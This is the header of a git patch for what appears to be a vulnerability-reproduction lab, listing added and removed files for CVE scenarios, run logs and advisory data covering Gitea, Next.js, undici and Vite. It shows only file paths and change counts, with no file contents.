From a3edc888346536acfe693aff55035bbcf53cf09e Mon Sep 17 00:00:00 2001
From: hao <hao@users.noreply.git.hk.hao.work>
Date: Tue, 17 Mar 2026 18:30:02 -0700
Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0:=20421=20=E4=B8=AA=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=20-=202026-03-17=2018:30:02?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../fixtures/gitea/authz-bypass/scenario.json |    2 +
 .../fixtures/gitea/file-upload/scenario.json  |    2 +
 .../gitea/proxy-boundary/scenario.json        |    2 +
 .../fixtures/gitea/ssrf/scenario.json         |    2 +
 .../fixtures/gitea/xss/scenario.json          |    2 +
 .../nextjs/authz-bypass/scenario.json         |    2 +
 .../nextjs/deserialization/scenario.json      |    2 +
 .../nextjs/proxy-boundary/scenario.json       |    2 +
 .../fixtures/nextjs/ssrf/scenario.json        |    2 +
 .../fixtures/nextjs/xss/scenario.json         |    2 +
 .../fixtures/shared/node_fixture.mjs          |  171 +
 .../fixtures/shared/python_fixture.py         |  193 +
 .../fixtures/undici/ssrf/scenario.json        |    2 +
 .../fixtures/vite/file-upload/scenario.json   |    2 +
 .../vite/proxy-boundary/scenario.json         |    2 +
 .../templates/fixtures/vite/xss/scenario.json |    2 +
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   57 +
 .../logs/baseline.json                        |   24 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   45 +
 .../report.md                                 |   66 +
 .../run.json                                  |  145 +
 .../timeline.mmd                              |    8 +
 .../assets/baseline-dom.html                  |   26 +
 .../assets/baseline.png                       |  Bin 0 -> 28111 bytes
 .../assets/proof-dom.html                     |   26 +
 .../assets/proof.png                          |  Bin 0 -> 36925 bytes
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   68 +
 .../logs/baseline-browser.json                |   14 +
 .../logs/baseline-console.json                |    1 +
 .../logs/baseline-network.json                |    6 +
 .../logs/baseline-page.json                   |    5 +
 .../logs/baseline.json                        |   24 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/proof-browser.json                   |   14 +
 .../logs/proof-console.json                   |    1 +
 .../logs/proof-network.json                   |    6 +
 .../logs/proof-page.json                      |    5 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   62 +
 .../report.md                                 |   86 +
 .../run.json                                  |  197 ++
 .../timeline.mmd                              |    8 +
 .../assets/baseline-dom.html                  |   26 +
 .../assets/baseline.png                       |  Bin 0 -> 27148 bytes
 .../assets/proof-dom.html                     |   26 +
 .../assets/proof.png                          |  Bin 0 -> 37970 bytes
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   53 +
 .../logs/baseline-browser.json                |   14 +
 .../logs/baseline-console.json                |    1 +
 .../logs/baseline-network.json                |    6 +
 .../logs/baseline-page.json                   |    5 +
 .../logs/baseline.json                        |   24 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/proof-browser.json                   |   14 +
 .../logs/proof-console.json                   |    1 +
 .../logs/proof-network.json                   |    6 +
 .../logs/proof-page.json                      |    5 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   62 +
 .../report.md                                 |   86 +
 .../run.json                                  |  197 ++
 .../timeline.mmd                              |    8 +
 .../assets/baseline-dom.html                  |   26 +
 .../assets/baseline.png                       |  Bin 0 -> 28111 bytes
 .../assets/proof-dom.html                     |   26 +
 .../assets/proof.png                          |  Bin 0 -> 36925 bytes
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   68 +
 .../logs/baseline-browser.json                |   14 +
 .../logs/baseline-console.json                |    1 +
 .../logs/baseline-network.json                |    6 +
 .../logs/baseline-page.json                   |    5 +
 .../logs/baseline.json                        |   24 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/proof-browser.json                   |   14 +
 .../logs/proof-console.json                   |    1 +
 .../logs/proof-network.json                   |    6 +
 .../logs/proof-page.json                      |    5 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   62 +
 .../report.md                                 |   86 +
 .../run.json                                  |  197 ++
 .../timeline.mmd                              |    8 +
 .../assets/baseline-dom.html                  |   26 +
 .../assets/baseline.png                       |  Bin 0 -> 27148 bytes
 .../assets/proof-dom.html                     |   26 +
 .../assets/proof.png                          |  Bin 0 -> 38082 bytes
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   53 +
 .../logs/baseline-browser.json                |   14 +
 .../logs/baseline-console.json                |    1 +
 .../logs/baseline-network.json                |    6 +
 .../logs/baseline-page.json                   |    5 +
 .../logs/baseline.json                        |   24 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/proof-browser.json                   |   14 +
 .../logs/proof-console.json                   |    1 +
 .../logs/proof-network.json                   |    6 +
 .../logs/proof-page.json                      |    5 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   62 +
 .../report.md                                 |   86 +
 .../run.json                                  |  197 ++
 .../timeline.mmd                              |    8 +
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   68 +
 .../logs/baseline.json                        |   24 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   45 +
 .../report.md                                 |   66 +
 .../run.json                                  |  145 +
 .../timeline.mmd                              |    8 +
 .../assets/baseline-dom.html                  |   26 +
 .../assets/baseline.png                       |  Bin 0 -> 28395 bytes
 .../assets/proof-dom.html                     |   26 +
 .../assets/proof.png                          |  Bin 0 -> 37208 bytes
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   68 +
 .../logs/baseline-browser.json                |   14 +
 .../logs/baseline-console.json                |    1 +
 .../logs/baseline-network.json                |    6 +
 .../logs/baseline-page.json                   |    5 +
 .../logs/baseline.json                        |   25 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/proof-browser.json                   |   14 +
 .../logs/proof-console.json                   |    1 +
 .../logs/proof-network.json                   |    6 +
 .../logs/proof-page.json                      |    5 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   62 +
 .../report.md                                 |   86 +
 .../run.json                                  |  197 ++
 .../timeline.mmd                              |    8 +
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   57 +
 .../logs/baseline.json                        |   25 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   45 +
 .../report.md                                 |   66 +
 .../run.json                                  |  145 +
 .../timeline.mmd                              |    8 +
 .../compose/compose.yaml                      |   26 +
 .../logs/attack.json                          |   68 +
 .../logs/baseline.json                        |   25 +
 .../logs/docker/app.log                       |    0
 .../logs/doctor.json                          |   44 +
 .../logs/ready.json                           |   12 +
 .../logs/seed.json                            |   21 +
 .../report.html                               |   45 +
 .../report.md                                 |   66 +
 .../run.json                                  |  145 +
 .../timeline.mmd                              |    8 +
 07-framework-security/cms/directus/INDEX.md   |    2 +-
 07-framework-security/cms/discourse/INDEX.md  |    2 +-
 07-framework-security/cms/drupal/INDEX.md     |    2 +-
 07-framework-security/cms/ghost/INDEX.md      |    2 +-
 07-framework-security/cms/joomla/INDEX.md     |    2 +-
 07-framework-security/cms/mediawiki/INDEX.md  |    2 +-
 07-framework-security/cms/moodle/INDEX.md     |    2 +-
 07-framework-security/cms/strapi/INDEX.md     |    2 +-
 07-framework-security/cms/wordpress/INDEX.md  |    2 +-
 .../ecommerce/adobe-commerce/INDEX.md         |    2 +-
 .../ecommerce/magento-open-source/INDEX.md    |    2 +-
 .../ecommerce/medusa/INDEX.md                 |    2 +-
 .../ecommerce/opencart/INDEX.md               |    2 +-
 .../ecommerce/openmage/INDEX.md               |    2 +-
 .../ecommerce/prestashop/INDEX.md             |    2 +-
 .../ecommerce/saleor/INDEX.md                 |    2 +-
 .../ecommerce/shopware/INDEX.md               |    2 +-
 .../ecommerce/woocommerce/INDEX.md            |    2 +-
 .../frameworks/angular/INDEX.md               |    2 +-
 .../frameworks/aspnet-core/INDEX.md           |    2 +-
 .../frameworks/astro/INDEX.md                 |    2 +-
 .../frameworks/django/INDEX.md                |    2 +-
 .../frameworks/echo/INDEX.md                  |    2 +-
 .../frameworks/esbuild/INDEX.md               |    2 +-
 .../frameworks/express/INDEX.md               |    2 +-
 .../frameworks/fastify/INDEX.md               |    2 +-
 .../frameworks/flask/INDEX.md                 |    2 +-
 07-framework-security/frameworks/gin/INDEX.md |    2 +-
 .../frameworks/hapi/INDEX.md                  |    2 +-
 07-framework-security/frameworks/koa/INDEX.md |    2 +-
 .../frameworks/laravel/INDEX.md               |    2 +-
 .../frameworks/nestjs/INDEX.md                |    2 +-
 .../frameworks/nextjs/INDEX.md                |   16 +-
 .../nextjs/cases/nextjs-cve-2020-15242.md     |   20 +-
 .../nextjs/cases/nextjs-cve-2024-51479.md     |   18 +-
 .../frameworks/nodejs/INDEX.md                |    2 +-
 .../frameworks/nuxt/INDEX.md                  |    2 +-
 .../frameworks/rails/INDEX.md                 |    2 +-
 .../frameworks/react/INDEX.md                 |    2 +-
 .../frameworks/spring-boot/INDEX.md           |    2 +-
 .../frameworks/spring-framework/INDEX.md      |    2 +-
 .../frameworks/spring-security/INDEX.md       |    2 +-
 .../frameworks/sveltekit/INDEX.md             |    2 +-
 .../frameworks/symfony/INDEX.md               |    2 +-
 .../frameworks/undici/INDEX.md                |    2 +-
 .../frameworks/vite/INDEX.md                  |    2 +-
 07-framework-security/frameworks/vue/INDEX.md |    2 +-
 .../frameworks/webpack/INDEX.md               |    2 +-
 .../frameworks/werkzeug/INDEX.md              |    2 +-
 .../platforms/adminer/INDEX.md                |    2 +-
 .../platforms/gitea/INDEX.md                  |   19 +-
 .../gitea/cases/gitea-cve-2018-15192.md       |   18 +-
 .../gitea/cases/gitea-cve-2018-18926.md       |   20 +-
 .../gitea/cases/gitea-cve-2019-1010261.md     |   20 +-
 .../gitea/cases/gitea-cve-2020-13246.md       |   20 +-
 .../gitea/cases/gitea-cve-2021-28378.md       |   20 +-
 .../gitea/cases/gitea-cve-2025-68940.md       |   18 +-
 .../platforms/gitlab-ce/INDEX.md              |    2 +-
 .../platforms/grafana/INDEX.md                |    2 +-
 .../platforms/jenkins/INDEX.md                |    2 +-
 .../platforms/kibana/INDEX.md                 |    2 +-
 .../platforms/mattermost/INDEX.md             |    2 +-
 .../platforms/phpmyadmin/INDEX.md             |    2 +-
 .../platforms/redmine/INDEX.md                |    2 +-
 .../servers/apache-httpd/INDEX.md             |    2 +-
 .../servers/apache-tomcat/INDEX.md            |    2 +-
 07-framework-security/servers/caddy/INDEX.md  |    2 +-
 .../servers/haproxy/INDEX.md                  |    2 +-
 07-framework-security/servers/nginx/INDEX.md  |    2 +-
 .../servers/traefik/INDEX.md                  |    2 +-
 08-threat-intel/generated/coverage-matrix.md  |    4 +-
 .../generated/dashboard/advisories.json       |  370 +-
 .../generated/dashboard/architecture.json     |   35 +-
 .../dashboard/docs/architecture-library.html  |   35 +-
 .../dashboard/docs/coverage-matrix.html       |    4 +-
 .../generated/dashboard/profiles.json         |  476 +++
 08-threat-intel/generated/dashboard/runs.json | 3149 ++++++++++++++++-
 .../generated/dashboard/summary.json          |   27 +-
 .../generated/dashboard/systems.json          |   14 +-
 08-threat-intel/generated/latest-ingest.md    |    8 +-
 08-threat-intel/generated/run-summary.json    |    8 +-
 .../advisories/gitea--CVE-2018-15192.json     |   80 -
 .../advisories/gitea--CVE-2018-18926.json     |   74 -
 .../advisories/gitea--CVE-2019-1010261.json   |   73 -
 .../advisories/gitea--CVE-2020-13246.json     |   75 -
 .../advisories/gitea--CVE-2021-28378.json     |   77 -
 .../advisories/gitea--CVE-2025-68939.json     |   74 -
 .../advisories/gitea--CVE-2025-68940.json     |   75 -
 .../advisories/nextjs--CVE-2020-15242.json    |   72 -
 .../advisories/nextjs--CVE-2024-34351.json    |   18 +-
 .../advisories/nextjs--CVE-2024-51479.json    |   73 -
 .../advisories/nextjs--CVE-2025-29927.json    |   85 -
 .../advisories/nextjs--CVE-2025-49826.json    |   75 -
 .../advisories/nextjs--CVE-2025-55173.json    |   76 -
 .../advisories/nextjs--CVE-2025-57752.json    |   76 -
 .../advisories/nextjs--CVE-2025-57822.json    |   76 -
 .../advisories/nextjs--CVE-2025-59471.json    |   77 -
 .../advisories/nextjs--CVE-2025-59472.json    |   74 -
 .../nextjs--GHSA-5j59-xgg2-r9c4.json          |   90 -
 .../nextjs--GHSA-9qr9-h5gf-34mp.json          |   83 -
 .../nextjs--GHSA-h25m-26qc-wcjf.json          |   88 -
 .../nextjs--GHSA-mwv6-3258-q52c.json          |   88 -
 .../nextjs--GHSA-w37m-7fhw-fmv9.json          |   86 -
 .../advisories/undici--CVE-2022-31151.json    |   79 -
 .../advisories/undici--CVE-2022-32210.json    |   71 -
 .../advisories/undici--CVE-2023-45143.json    |   81 -
 .../advisories/undici--CVE-2024-30260.json    |   79 -
 .../advisories/undici--CVE-2024-30261.json    |   79 -
 .../advisories/undici--CVE-2025-22150.json    |   80 -
 .../advisories/undici--CVE-2025-47279.json    |   77 -
 .../advisories/undici--CVE-2026-1525.json     |   77 -
 .../advisories/undici--CVE-2026-1526.json     |   77 -
 .../advisories/undici--CVE-2026-1527.json     |   74 -
 .../advisories/undici--CVE-2026-1528.json     |   74 -
 .../advisories/undici--CVE-2026-22036.json    |   73 -
 .../advisories/undici--CVE-2026-2229.json     |   77 -
 .../advisories/undici--CVE-2026-2581.json     |   72 -
 .../advisories/vite--CVE-2024-23331.json      |   83 -
 .../advisories/vite--CVE-2024-45811.json      |   86 -
 .../advisories/vite--CVE-2024-45812.json      |   92 -
 .../advisories/vite--CVE-2025-24010.json      |   78 -
 .../advisories/vite--CVE-2025-30208.json      |   84 -
 .../advisories/vite--CVE-2025-31125.json      |   81 -
 .../advisories/vite--CVE-2025-31486.json      |   82 -
 .../advisories/vite--CVE-2025-32395.json      |   80 -
 .../advisories/vite--CVE-2025-46565.json      |   80 -
 .../advisories/vite--CVE-2025-58751.json      |   82 -
 .../advisories/vite--CVE-2025-58752.json      |   83 -
 .../advisories/vite--CVE-2025-62522.json      |   81 -
 ...-gitea--CVE-2018-15192-20260318012749.json |  145 +
 ...-gitea--CVE-2018-18926-20260318012526.json |  197 ++
 ...itea--CVE-2019-1010261-20260318012624.json |  197 ++
 ...-gitea--CVE-2020-13246-20260318012806.json |  197 ++
 ...-gitea--CVE-2021-28378-20260318012813.json |  197 ++
 ...-gitea--CVE-2025-68940-20260318012708.json |  145 +
 ...nextjs--CVE-2020-15242-20260318012830.json |  197 ++
 ...nextjs--CVE-2024-34351-20260318012953.json |  145 +
 ...nextjs--CVE-2024-51479-20260318012913.json |  145 +
 08-threat-intel/registry/systems/adminer.json |   20 -
 .../registry/systems/adobe-commerce.json      |   22 -
 08-threat-intel/registry/systems/angular.json |   21 -
 .../registry/systems/apache-httpd.json        |   21 -
 .../registry/systems/apache-tomcat.json       |   21 -
 .../registry/systems/aspnet-core.json         |   21 -
 08-threat-intel/registry/systems/astro.json   |   20 -
 08-threat-intel/registry/systems/caddy.json   |   20 -
 .../registry/systems/directus.json            |   21 -
 .../registry/systems/discourse.json           |   21 -
 08-threat-intel/registry/systems/django.json  |   21 -
 08-threat-intel/registry/systems/drupal.json  |   22 -
 08-threat-intel/registry/systems/echo.json    |   20 -
 08-threat-intel/registry/systems/esbuild.json |   20 -
 08-threat-intel/registry/systems/express.json |   21 -
 08-threat-intel/registry/systems/fastify.json |   21 -
 08-threat-intel/registry/systems/flask.json   |   21 -
 08-threat-intel/registry/systems/ghost.json   |   21 -
 08-threat-intel/registry/systems/gin.json     |   20 -
 08-threat-intel/registry/systems/gitea.json   |   59 -
 .../registry/systems/gitlab-ce.json           |   21 -
 08-threat-intel/registry/systems/grafana.json |   21 -
 08-threat-intel/registry/systems/hapi.json    |   20 -
 08-threat-intel/registry/systems/haproxy.json |   20 -
 08-threat-intel/registry/systems/jenkins.json |   21 -
 08-threat-intel/registry/systems/joomla.json  |   22 -
 08-threat-intel/registry/systems/kibana.json  |   21 -
 08-threat-intel/registry/systems/koa.json     |   20 -
 08-threat-intel/registry/systems/laravel.json |   21 -
 .../registry/systems/magento-open-source.json |   21 -
 .../registry/systems/mattermost.json          |   21 -
 .../registry/systems/mediawiki.json           |   21 -
 08-threat-intel/registry/systems/medusa.json  |   20 -
 08-threat-intel/registry/systems/moodle.json  |   21 -
 08-threat-intel/registry/systems/nestjs.json  |   21 -
 08-threat-intel/registry/systems/nextjs.json  |   48 -
 08-threat-intel/registry/systems/nginx.json   |   21 -
 08-threat-intel/registry/systems/nodejs.json  |   21 -
 08-threat-intel/registry/systems/nuxt.json    |   21 -
 .../registry/systems/opencart.json            |   21 -
 .../registry/systems/openmage.json            |   20 -
 .../registry/systems/phpmyadmin.json          |   21 -
 .../registry/systems/prestashop.json          |   21 -
 08-threat-intel/registry/systems/rails.json   |   21 -
 08-threat-intel/registry/systems/react.json   |   21 -
 08-threat-intel/registry/systems/redmine.json |   21 -
 08-threat-intel/registry/systems/saleor.json  |   20 -
 .../registry/systems/shopware.json            |   21 -
 .../registry/systems/spring-boot.json         |   20 -
 .../registry/systems/spring-framework.json    |   21 -
 .../registry/systems/spring-security.json     |   21 -
 08-threat-intel/registry/systems/strapi.json  |   21 -
 .../registry/systems/sveltekit.json           |   20 -
 08-threat-intel/registry/systems/symfony.json |   21 -
 08-threat-intel/registry/systems/traefik.json |   20 -
 08-threat-intel/registry/systems/undici.json  |   35 -
 08-threat-intel/registry/systems/vite.json    |   34 -
 08-threat-intel/registry/systems/vue.json     |   21 -
 08-threat-intel/registry/systems/webpack.json |   20 -
 .../registry/systems/werkzeug.json            |   20 -
 .../registry/systems/woocommerce.json         |   21 -
 .../registry/systems/wordpress.json           |   22 -
 .../system-family/gitea-authz-bypass.yaml     |   62 +
 .../system-family/gitea-file-upload.yaml      |   64 +
 .../system-family/gitea-proxy-boundary.yaml   |   64 +
 .../system-family/gitea-ssrf.yaml             |   62 +
 .../system-family/gitea-xss.yaml              |   64 +
 .../system-family/nextjs-authz-bypass.yaml    |   62 +
 .../system-family/nextjs-deserialization.yaml |   62 +
 .../system-family/nextjs-proxy-boundary.yaml  |   64 +
 .../system-family/nextjs-ssrf.yaml            |   62 +
 .../system-family/nextjs-xss.yaml             |   64 +
 .../system-family/undici-ssrf.yaml            |   62 +
 .../system-family/vite-file-upload.yaml       |   64 +
 .../system-family/vite-proxy-boundary.yaml    |   64 +
 .../system-family/vite-xss.yaml               |   64 +
 scripts/lab/attack.py                         |    6 +
 scripts/lab/baseline.py                       |   38 +-
 scripts/lab/browser.py                        |   28 +-
 scripts/lab/compose.py                        |   11 +
 scripts/lab/doctor.py                         |  131 +
 scripts/lab/evaluate.py                       |  100 +
 scripts/lab/main.py                           |  122 +-
 scripts/lab/provision.py                      |   57 +-
 scripts/lab/repro.py                          |    8 +
 scripts/lab/runners/__init__.py               |    4 +
 scripts/lab/runners/common.py                 |  169 +
 scripts/lab/runners/dispatcher.py             |   36 +
 scripts/lab/runners/gitea/__init__.py         |    2 +
 scripts/lab/runners/gitea/authz_bypass.py     |   10 +
 scripts/lab/runners/gitea/file_upload.py      |   10 +
 scripts/lab/runners/gitea/proxy_boundary.py   |   10 +
 scripts/lab/runners/gitea/ssrf.py             |   10 +
 scripts/lab/runners/gitea/xss.py              |   10 +
 scripts/lab/runners/nextjs/__init__.py        |    2 +
 scripts/lab/runners/nextjs/authz_bypass.py    |   10 +
 scripts/lab/runners/nextjs/deserialization.py |   10 +
 scripts/lab/runners/nextjs/proxy_boundary.py  |   10 +
 scripts/lab/runners/nextjs/ssrf.py            |   10 +
 scripts/lab/runners/nextjs/xss.py             |   10 +
 scripts/lab/runners/undici/__init__.py        |    2 +
 scripts/lab/runners/undici/ssrf.py            |   10 +
 scripts/lab/runners/vite/__init__.py          |    2 +
 scripts/lab/runners/vite/file_upload.py       |   10 +
 scripts/lab/runners/vite/proxy_boundary.py    |   10 +
 scripts/lab/runners/vite/xss.py               |   10 +
 scripts/lab/seed.py                           |   23 +-
 scripts/lab/validators.py                     |    3 +
 421 files changed, 12474 insertions(+), 5845 deletions(-)
 create mode 100644 00-environments/templates/fixtures/gitea/authz-bypass/scenario.json
 create mode 100644 00-environments/templates/fixtures/gitea/file-upload/scenario.json
 create mode 100644 00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json
 create mode 100644 00-environments/templates/fixtures/gitea/ssrf/scenario.json
 create mode 100644 00-environments/templates/fixtures/gitea/xss/scenario.json
 create mode 100644 00-environments/templates/fixtures/nextjs/authz-bypass/scenario.json
 create mode 100644 00-environments/templates/fixtures/nextjs/deserialization/scenario.json
 create mode 100644 00-environments/templates/fixtures/nextjs/proxy-boundary/scenario.json
 create mode 100644 00-environments/templates/fixtures/nextjs/ssrf/scenario.json
 create mode 100644 00-environments/templates/fixtures/nextjs/xss/scenario.json
 create mode 100644 00-environments/templates/fixtures/shared/node_fixture.mjs
 create mode 100644 00-environments/templates/fixtures/shared/python_fixture.py
 create mode 100644 00-environments/templates/fixtures/undici/ssrf/scenario.json
 create mode 100644 00-environments/templates/fixtures/vite/file-upload/scenario.json
 create mode 100644 00-environments/templates/fixtures/vite/proxy-boundary/scenario.json
 create mode 100644 00-environments/templates/fixtures/vite/xss/scenario.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/run.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/run.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/ready.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/seed.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/run.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/doctor.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-browser.json
 create mode 100644 06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json
